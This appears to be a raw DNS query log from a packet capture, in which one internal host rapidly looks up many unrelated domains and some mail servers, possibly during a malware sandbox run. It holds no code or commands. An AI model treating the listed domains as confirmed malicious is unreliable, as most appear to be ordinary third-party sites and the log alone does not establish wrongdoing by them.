Mar 22, 2023 05:44:28.155354023 CET	192.168.2.5	8.8.8.8	0xe195	Standard query (0)	atbauk.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:28.156910896 CET	192.168.2.5	8.8.8.8	0xcd7d	Standard query (0)	reproar.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:28.170286894 CET	192.168.2.5	8.8.8.8	0x486c	Standard query (0)	x96.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:28.172391891 CET	192.168.2.5	8.8.8.8	0xda	Standard query (0)	averwin.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:28.214706898 CET	192.168.2.5	8.8.8.8	0x68bf	Standard query (0)	rast.se	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:28.246540070 CET	192.168.2.5	8.8.8.8	0xea50	Standard query (0)	webband.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:28.264691114 CET	192.168.2.5	8.8.8.8	0xaa30	Standard query (0)	grlawcc.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:28.274163961 CET	192.168.2.5	8.8.8.8	0xf91	Standard query (0)	ascc.org.au	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:28.289608955 CET	192.168.2.5	8.8.8.8	0x9e4	Standard query (0)	nettle.pl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:28.293817043 CET	192.168.2.5	8.8.8.8	0x31e9	Standard query (0)	hyab.se	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:28.310306072 CET	192.168.2.5	8.8.8.8	0xf0de	Standard query (0)	kallman.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:28.330049992 CET	192.168.2.5	8.8.8.8	0x9f3b	Standard query (0)	iranytu.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:28.353156090 CET	192.168.2.5	8.8.8.8	0xc96a	Standard query (0)	skypearl.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:28.387398005 CET	192.168.2.5	8.8.8.8	0x7eb	Standard query (0)	sidepath.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:28.398040056 CET	192.168.2.5	8.8.8.8	0x8ca1	Standard query (0)	sgk.home.pl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:28.405647039 CET	192.168.2.5	8.8.8.8	0x6076	Standard query (0)	dyag-eng.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:28.417572975 CET	192.168.2.5	8.8.8.8	0x6aa1	Standard query (0)	nlcv.bas.bg	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:28.423122883 CET	192.168.2.5	8.8.8.8	0xe48f	Standard query (0)	mackusick.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:28.448760033 CET	192.168.2.5	8.8.8.8	0x4e7d	Standard query (0)	www.11tochi.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:28.617639065 CET	192.168.2.5	8.8.8.8	0xbf1b	Standard query (0)	clinicasanluis.com.co	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:28.644258976 CET	192.168.2.5	8.8.8.8	0x41c0	Standard query (0)	beafin.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:28.644392967 CET	192.168.2.5	8.8.8.8	0xc9de	Standard query (0)	zugseil.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:28.654191017 CET	192.168.2.5	8.8.8.8	0x1280	Standard query (0)	actmin.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:28.744081020 CET	192.168.2.5	8.8.8.8	0xefd0	Standard query (0)	adventist.ro	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:28.888915062 CET	192.168.2.5	192.33.4.12	0xbf	Standard query (0)	com	NS (Name server)	IN (0x0001)	false
Mar 22, 2023 05:44:28.917136908 CET	192.168.2.5	192.5.5.241	0xe9	Standard query (0)	org	NS (Name server)	IN (0x0001)	false
Mar 22, 2023 05:44:28.941905022 CET	192.168.2.5	128.8.10.90	0xfc	Standard query (0)	de	NS (Name server)	IN (0x0001)	false
Mar 22, 2023 05:44:28.951345921 CET	192.168.2.5	8.8.8.8	0xb143	Standard query (0)	ultibax.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:28.977590084 CET	192.168.2.5	8.8.8.8	0xf40	Standard query (0)	cpmteam.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:28.993197918 CET	192.168.2.5	8.8.8.8	0x1064	Standard query (0)	ultibax.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:28.996340990 CET	192.168.2.5	8.8.8.8	0x9b28	Standard query (0)	agulatex.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:29.072787046 CET	192.168.2.5	8.8.8.8	0x4dd5	Standard query (0)	ultibax.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:29.135711908 CET	192.168.2.5	8.8.8.8	0x9bdf	Standard query (0)	sjbmw.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:29.135711908 CET	192.168.2.5	8.8.8.8	0x553a	Standard query (0)	pleszew.policja.gov.pl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:29.210441113 CET	192.168.2.5	8.8.8.8	0xea50	Standard query (0)	webband.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:29.253931999 CET	192.168.2.5	8.8.8.8	0x35f3	Standard query (0)	nekono.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:29.257312059 CET	192.168.2.5	8.8.8.8	0x6938	Standard query (0)	nblewis.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:29.301743984 CET	192.168.2.5	8.8.8.8	0x9d4d	Standard query (0)	www.ex-olive.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:29.306448936 CET	192.168.2.5	8.8.8.8	0x2699	Standard query (0)	www.usadig.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:29.393855095 CET	192.168.2.5	8.8.8.8	0xe9e4	Standard query (0)	ramkome.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:29.432399988 CET	192.168.2.5	8.8.8.8	0xed42	Standard query (0)	revoldia.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:29.434775114 CET	192.168.2.5	8.8.8.8	0x262	Standard query (0)	wvs-net.de	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:29.465758085 CET	192.168.2.5	8.8.8.8	0x80b3	Standard query (0)	nettlinx.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:29.472556114 CET	192.168.2.5	8.8.8.8	0x10a8	Standard query (0)	www.pb-games.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:29.497271061 CET	192.168.2.5	8.8.8.8	0x4143	Standard query (0)	likangds.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:29.498148918 CET	192.168.2.5	8.8.8.8	0xad42	Standard query (0)	web-york.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:29.532330990 CET	192.168.2.5	8.8.8.8	0xe03b	Standard query (0)	flamingorecordings.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:29.587959051 CET	192.168.2.5	8.8.8.8	0xd611	Standard query (0)	epc.com.au	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:29.590322971 CET	192.168.2.5	8.8.8.8	0xc59a	Standard query (0)	kumaden.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:29.632322073 CET	192.168.2.5	8.8.8.8	0xa929	Standard query (0)	indonesiamedia.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:29.830594063 CET	192.168.2.5	8.8.8.8	0xf6a7	Standard query (0)	n23china.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:29.912301064 CET	192.168.2.5	8.8.8.8	0x40d2	Standard query (0)	techtrans.de	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:30.014746904 CET	192.168.2.5	8.8.8.8	0x2f58	Standard query (0)	impexnc.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:30.038726091 CET	192.168.2.5	8.8.8.8	0xd4a2	Standard query (0)	canmore.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:30.071266890 CET	192.168.2.5	8.8.8.8	0x9675	Standard query (0)	canmore.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:30.108551025 CET	192.168.2.5	8.8.8.8	0x5d57	Standard query (0)	canmore.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:30.137444019 CET	192.168.2.5	8.8.8.8	0x5cc	Standard query (0)	www.koz1.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:30.207309008 CET	192.168.2.5	8.8.8.8	0xa192	Standard query (0)	coxkitchensandbaths.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:30.214361906 CET	192.168.2.5	8.8.8.8	0xa253	Standard query (0)	magicomm.co.uk	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:30.220413923 CET	192.168.2.5	8.8.8.8	0x21ca	Standard query (0)	rokoron.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:30.226411104 CET	192.168.2.5	8.8.8.8	0xea50	Standard query (0)	webband.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:30.260505915 CET	192.168.2.5	8.8.8.8	0x84b8	Standard query (0)	cpmteam.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:30.390417099 CET	192.168.2.5	8.8.8.8	0x515	Standard query (0)	n23china.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:30.597984076 CET	192.168.2.5	8.8.8.8	0x8cd1	Standard query (0)	fundeo.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:30.611505985 CET	192.168.2.5	8.8.8.8	0xd648	Standard query (0)	snf.it	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:30.611505985 CET	192.168.2.5	8.8.8.8	0x52a5	Standard query (0)	dayvo.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:30.621387005 CET	192.168.2.5	8.8.8.8	0xf4c	Standard query (0)	nettle.pl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:30.678349018 CET	192.168.2.5	8.8.8.8	0xe865	Standard query (0)	com-edit.fr	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:30.701550007 CET	192.168.2.5	8.8.8.8	0x1280	Standard query (0)	actmin.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:30.750996113 CET	192.168.2.5	8.8.8.8	0x2ed1	Standard query (0)	xult.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:30.756547928 CET	192.168.2.5	192.5.5.241	0xcf	Standard query (0)	com	NS (Name server)	IN (0x0001)	false
Mar 22, 2023 05:44:30.783557892 CET	192.168.2.5	192.58.128.30	0x99	Standard query (0)	org	NS (Name server)	IN (0x0001)	false
Mar 22, 2023 05:44:30.812089920 CET	192.168.2.5	8.8.8.8	0x4a9	Standard query (0)	www.sclover3.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:30.824006081 CET	192.168.2.5	192.5.5.241	0x9	Standard query (0)	de	NS (Name server)	IN (0x0001)	false
Mar 22, 2023 05:44:30.839361906 CET	192.168.2.5	8.8.8.8	0x1e90	Standard query (0)	portoccd.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:30.859138966 CET	192.168.2.5	8.8.8.8	0x6ea6	Standard query (0)	piacton.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:31.043193102 CET	192.168.2.5	8.8.8.8	0x2dc3	Standard query (0)	n23china.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:31.062588930 CET	192.168.2.5	8.8.8.8	0x5148	Standard query (0)	zupraha.cz	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:31.095396042 CET	192.168.2.5	8.8.8.8	0xda9	Standard query (0)	n23china.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:31.109031916 CET	192.168.2.5	8.8.8.8	0xa90c	Standard query (0)	cnti.krsn.ru	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:31.122570038 CET	192.168.2.5	8.8.8.8	0x241f	Standard query (0)	n23china.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:31.139616013 CET	192.168.2.5	8.8.8.8	0x7f43	Standard query (0)	pers.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:31.153290987 CET	192.168.2.5	8.8.8.8	0x9e6d	Standard query (0)	piacton.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:31.318978071 CET	192.168.2.5	8.8.8.8	0x8583	Standard query (0)	a-domani.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:31.343995094 CET	192.168.2.5	8.8.8.8	0x8ce0	Standard query (0)	amba-tc.si	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:31.347451925 CET	192.168.2.5	8.8.8.8	0xfebe	Standard query (0)	any-s.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:31.436106920 CET	192.168.2.5	8.8.8.8	0xb348	Standard query (0)	vdoherty.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:31.446257114 CET	192.168.2.5	8.8.8.8	0x5721	Standard query (0)	wantapc.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:31.450087070 CET	192.168.2.5	8.8.8.8	0x7e60	Standard query (0)	skgm.ru	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:31.478646994 CET	192.168.2.5	8.8.8.8	0xd35d	Standard query (0)	amba-tc.si	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:31.551834106 CET	192.168.2.5	8.8.8.8	0xe10a	Standard query (0)	amba-tc.si	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:31.574095964 CET	192.168.2.5	8.8.8.8	0x4d72	Standard query (0)	piacton.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:31.600780010 CET	192.168.2.5	8.8.8.8	0xe0c4	Standard query (0)	karmy.com.pl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:31.609980106 CET	192.168.2.5	8.8.8.8	0xce1	Standard query (0)	revoldia.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:31.821645975 CET	192.168.2.5	8.8.8.8	0xda7f	Standard query (0)	riwn.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:32.050340891 CET	192.168.2.5	8.8.8.8	0xc731	Standard query (0)	gmail-smtp-in.l.google.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:32.278752089 CET	192.168.2.5	8.8.8.8	0x7170	Standard query (0)	nekono.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:32.295037031 CET	192.168.2.5	8.8.8.8	0x6f24	Standard query (0)	webband.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:32.401971102 CET	192.168.2.5	8.8.8.8	0xbc20	Standard query (0)	reproar.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:32.508930922 CET	192.168.2.5	8.8.8.8	0x97bd	Standard query (0)	scintel.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:32.512883902 CET	192.168.2.5	8.8.8.8	0x8843	Standard query (0)	btsi.com.ph	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:32.630996943 CET	192.168.2.5	8.8.8.8	0xebb	Standard query (0)	ie-roi.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:32.777513981 CET	192.168.2.5	8.8.8.8	0xa274	Standard query (0)	n23china.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:32.777662992 CET	192.168.2.5	8.8.8.8	0xcc62	Standard query (0)	peminet.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:32.783400059 CET	192.168.2.5	8.8.8.8	0x5c46	Standard query (0)	hyab.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:33.326487064 CET	192.168.2.5	8.8.8.8	0x6f24	Standard query (0)	webband.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:33.423290968 CET	192.168.2.5	8.8.8.8	0xf345	Standard query (0)	cbras.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:33.439882994 CET	192.168.2.5	8.8.8.8	0xb289	Standard query (0)	ktenergo.ru	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:33.771291971 CET	192.168.2.5	8.8.8.8	0xf49e	Standard query (0)	ie-roi.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:35.150049925 CET	192.168.2.5	8.8.8.8	0x806a	Standard query (0)	paraski.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:35.250421047 CET	192.168.2.5	8.8.8.8	0x6680	Standard query (0)	holp-ai.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:35.337697983 CET	192.168.2.5	8.8.8.8	0x6f24	Standard query (0)	webband.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:35.346798897 CET	192.168.2.5	128.8.10.90	0xfc	Standard query (0)	de	NS (Name server)	IN (0x0001)	false
Mar 22, 2023 05:44:35.354476929 CET	192.168.2.5	8.8.8.8	0xe769	Standard query (0)	ktenergo.ru	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:35.368225098 CET	192.168.2.5	8.8.8.8	0x55a2	Standard query (0)	ie-roi.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:35.384463072 CET	192.168.2.5	8.8.8.8	0x3617	Standard query (0)	wnit.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:35.396209002 CET	192.168.2.5	8.8.8.8	0x5347	Standard query (0)	dog-jog.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:35.397200108 CET	192.168.2.5	8.8.8.8	0xc137	Standard query (0)	gbmfg.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:35.399166107 CET	192.168.2.5	8.8.8.8	0x6b9f	Standard query (0)	acraloc.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:35.440196991 CET	192.168.2.5	8.8.8.8	0x3ccb	Standard query (0)	rokoron.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:35.454303026 CET	192.168.2.5	8.8.8.8	0x8df4	Standard query (0)	ktenergo.ru	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:35.566625118 CET	192.168.2.5	8.8.8.8	0x5c46	Standard query (0)	hyab.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:35.599505901 CET	192.168.2.5	8.8.8.8	0xe964	Standard query (0)	michiana.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:35.700846910 CET	192.168.2.5	8.8.8.8	0x7467	Standard query (0)	cqdgroup.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:35.878079891 CET	192.168.2.5	8.8.8.8	0x897f	Standard query (0)	michiana.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:35.905642986 CET	192.168.2.5	8.8.8.8	0xea40	Standard query (0)	ultibax.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:35.950944901 CET	192.168.2.5	8.8.8.8	0x38f	Standard query (0)	ultibax.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:36.084336996 CET	192.168.2.5	8.8.8.8	0x91a2	Standard query (0)	ultibax.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:36.146714926 CET	192.168.2.5	8.8.8.8	0xfaec	Standard query (0)	michiana.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:36.153743982 CET	192.168.2.5	8.8.8.8	0xbdec	Standard query (0)	snf.it	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:36.246160984 CET	192.168.2.5	8.8.8.8	0x4875	Standard query (0)	sidepath.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:36.432156086 CET	192.168.2.5	8.8.8.8	0xc9c7	Standard query (0)	c-drop.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:36.484348059 CET	192.168.2.5	8.8.8.8	0x4d77	Standard query (0)	chzko.ru	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:36.542968035 CET	192.168.2.5	8.8.8.8	0x7f01	Standard query (0)	dataform.co.uk	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:36.556536913 CET	192.168.2.5	8.8.8.8	0x8221	Standard query (0)	dog-jog.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:36.563994884 CET	192.168.2.5	8.8.8.8	0xb17c	Standard query (0)	chzko.ru	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:36.575922012 CET	192.168.2.5	8.8.8.8	0x4ea0	Standard query (0)	smtp.mail.yahoo.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:36.596731901 CET	192.168.2.5	8.8.8.8	0x8606	Standard query (0)	oh28ya.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:36.597616911 CET	192.168.2.5	8.8.8.8	0x57b5	Standard query (0)	chzko.ru	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:36.661206007 CET	192.168.2.5	8.8.8.8	0x176b	Standard query (0)	wanoa.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:36.721744061 CET	192.168.2.5	8.8.8.8	0xdc88	Standard query (0)	c-drop.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:36.834136009 CET	192.168.2.5	8.8.8.8	0x6af2	Standard query (0)	ossir.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:37.011274099 CET	192.168.2.5	8.8.8.8	0xc3c1	Standard query (0)	c-drop.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:37.065593958 CET	192.168.2.5	8.8.8.8	0x39a9	Standard query (0)	www.fnw.us	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:37.066210985 CET	192.168.2.5	8.8.8.8	0x60f1	Standard query (0)	www.ftchat.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:37.073199034 CET	192.168.2.5	8.8.8.8	0xb130	Standard query (0)	sokuwan.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:37.106287003 CET	192.168.2.5	8.8.8.8	0xb7c9	Standard query (0)	www.wnsavoy.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:37.313659906 CET	192.168.2.5	8.8.8.8	0xbbec	Standard query (0)	gujarat.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:37.387470007 CET	192.168.2.5	8.8.8.8	0x8bfb	Standard query (0)	komie.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:37.484743118 CET	192.168.2.5	8.8.8.8	0x95d1	Standard query (0)	anduran.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:37.622742891 CET	192.168.2.5	8.8.8.8	0xf911	Standard query (0)	www.wkhk.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:37.647948027 CET	192.168.2.5	8.8.8.8	0xa51f	Standard query (0)	vivastay.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:37.802958012 CET	192.168.2.5	8.8.8.8	0x26d3	Standard query (0)	atis-sk.ca	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:37.883972883 CET	192.168.2.5	8.8.8.8	0x3709	Standard query (0)	atis-sk.ca	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:37.971949100 CET	192.168.2.5	8.8.8.8	0x8f2e	Standard query (0)	atis-sk.ca	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:37.994255066 CET	192.168.2.5	8.8.8.8	0x2583	Standard query (0)	fr-dat.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:38.376534939 CET	192.168.2.5	8.8.8.8	0x3646	Standard query (0)	t-trust.jp	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:38.426315069 CET	192.168.2.5	8.8.8.8	0xbc16	Standard query (0)	cbras.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:38.429625988 CET	192.168.2.5	8.8.8.8	0x7ede	Standard query (0)	kustnara.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:38.520044088 CET	192.168.2.5	8.8.8.8	0x7673	Standard query (0)	4locals.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:38.649612904 CET	192.168.2.5	8.8.8.8	0x359c	Standard query (0)	geecl.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:38.757656097 CET	192.168.2.5	8.8.8.8	0xc097	Standard query (0)	softizer.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:38.949482918 CET	192.168.2.5	8.8.8.8	0x50fb	Standard query (0)	gphpedit.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:38.975591898 CET	192.168.2.5	8.8.8.8	0xa0a1	Standard query (0)	tbvlugus.nl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:39.480436087 CET	192.168.2.5	8.8.8.8	0x542d	Standard query (0)	kewlmail.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:39.480915070 CET	192.168.2.5	8.8.8.8	0x454a	Standard query (0)	shanks.co.uk	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:39.481105089 CET	192.168.2.5	8.8.8.8	0xfb05	Standard query (0)	noblesse.be	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:39.503874063 CET	192.168.2.5	8.8.8.8	0xf7e5	Standard query (0)	t-trust.jp	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:39.517935991 CET	192.168.2.5	8.8.8.8	0xb019	Standard query (0)	yhsll.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:39.519772053 CET	192.168.2.5	8.8.8.8	0xe241	Standard query (0)	scintel.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:39.527093887 CET	192.168.2.5	8.8.8.8	0xd3b4	Standard query (0)	cyclad.pl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:39.632117987 CET	192.168.2.5	8.8.8.8	0x1900	Standard query (0)	aluminox.es	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:39.741252899 CET	192.168.2.5	8.8.8.8	0x653d	Standard query (0)	juso-gr.ch	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:39.790734053 CET	192.168.2.5	8.8.8.8	0x4c89	Standard query (0)	ntc.edu.au	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:40.297115088 CET	192.168.2.5	8.8.8.8	0x4804	Standard query (0)	chzko.ru	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:40.303119898 CET	192.168.2.5	8.8.8.8	0x6cc6	Standard query (0)	multip.hu	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:40.334940910 CET	192.168.2.5	8.8.8.8	0x33a6	Standard query (0)	floopis.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:40.346205950 CET	192.168.2.5	8.8.8.8	0xe9b4	Standard query (0)	toundo.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:40.358028889 CET	192.168.2.5	8.8.8.8	0x7f29	Standard query (0)	gbmfg.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:40.359886885 CET	192.168.2.5	8.8.8.8	0x4f07	Standard query (0)	beafin.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:40.360466957 CET	192.168.2.5	8.8.8.8	0x751b	Standard query (0)	vvsteknik.dk	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:40.360539913 CET	192.168.2.5	8.8.8.8	0x994c	Standard query (0)	refintl.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:40.374089003 CET	192.168.2.5	8.8.8.8	0xc470	Standard query (0)	deckoviny.cz	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:40.386605978 CET	192.168.2.5	8.8.8.8	0x8aee	Standard query (0)	cjborden.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:40.392405033 CET	192.168.2.5	8.8.8.8	0x7716	Standard query (0)	yhsll.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:40.403014898 CET	192.168.2.5	8.8.8.8	0xef43	Standard query (0)	lyto.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:40.415733099 CET	192.168.2.5	8.8.8.8	0x142f	Standard query (0)	simetar.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:40.423847914 CET	192.168.2.5	8.8.8.8	0xf6c1	Standard query (0)	kayoaiba.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:40.429486990 CET	192.168.2.5	8.8.8.8	0x2b17	Standard query (0)	toundo.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:40.430392981 CET	192.168.2.5	8.8.8.8	0x906a	Standard query (0)	avc.com.sa	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:40.433607101 CET	192.168.2.5	8.8.8.8	0xe62a	Standard query (0)	htsmx.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:40.435058117 CET	192.168.2.5	8.8.8.8	0x183e	Standard query (0)	hazmatt.com	A (IP address)	IN (0x0001)	false
